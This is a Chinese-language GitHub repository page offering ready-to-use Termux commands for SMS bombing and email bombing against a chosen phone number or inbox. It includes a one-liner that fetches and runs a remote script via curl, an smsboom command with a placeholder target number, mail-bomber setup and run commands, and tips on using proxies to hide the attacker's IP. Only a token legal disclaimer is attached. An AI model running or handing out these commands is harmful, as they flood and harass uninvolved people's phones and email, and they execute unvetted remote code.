Skip to content

最新可用!!!smsboom短信测压/短信轰炸测试,邮箱爆破,安卓手机终端可用,termux一键指令

Notifications You must be signed in to change notification settings

cat-bucket/cat-osint

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

63 Commits
 
 
 
 
 
 
 
 

Repository files navigation

概述

  • 如果你还没有下载termux可以点击这里

  • 若你没有科学环境可以自行搜索下载,或者点击这里

  • 假如你在代码使用的过程中出现类似于的选项。

Do you want to continue? [Y/n]

  • 直接回车enter即可

一键代码使用

短信轰炸

source <(curl -L https://raw.githubusercontent.com/cat-bucket/cat-osint/main/sms.txt)

  • 直接粘贴代码进入即可,后续可以直接使用下列指令
  • cd SMSBoom;python smsboom.py run -t 64 -p 184****9269 -f 60 将手机号替换为你需要轰炸的手机号

代理的使用

代理可以帮助你隐藏真实IP(切勿进行非法活动)

如果你需要免费的代理IP可以点击这里

将代理粘贴到 http_proxy.txt socks4_proxy.txt socks5_proxy.txt 比如 假如使用http代理 就可以cd SMSBoom && nano http_proxy.txt 然后粘贴 最后命令参数添加 -e 执行即可.

邮箱轰炸

在使用之前配置

pkg install git -y && pkg install php -y && pkg install python -y && git clone https://github.com/cat-bucket/mail-bomber && cd mail-bomber

无需邮箱但无法指定内容

更新接口(可选)

php index.php update-nodes

后续使用

cd mail-bomber;php index.php start-bombing 邮箱

替换要轰炸的邮箱

免责声明

本库为对各种程序的简单调用提供,仅供参考,禁止用于商业及非法用途。使用一键指令可能造成的事故与损失,短信轰炸并不安全,警遵中国法律。

About

最新可用!!!smsboom短信测压/短信轰炸测试,邮箱爆破,安卓手机终端可用,termux一键指令

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages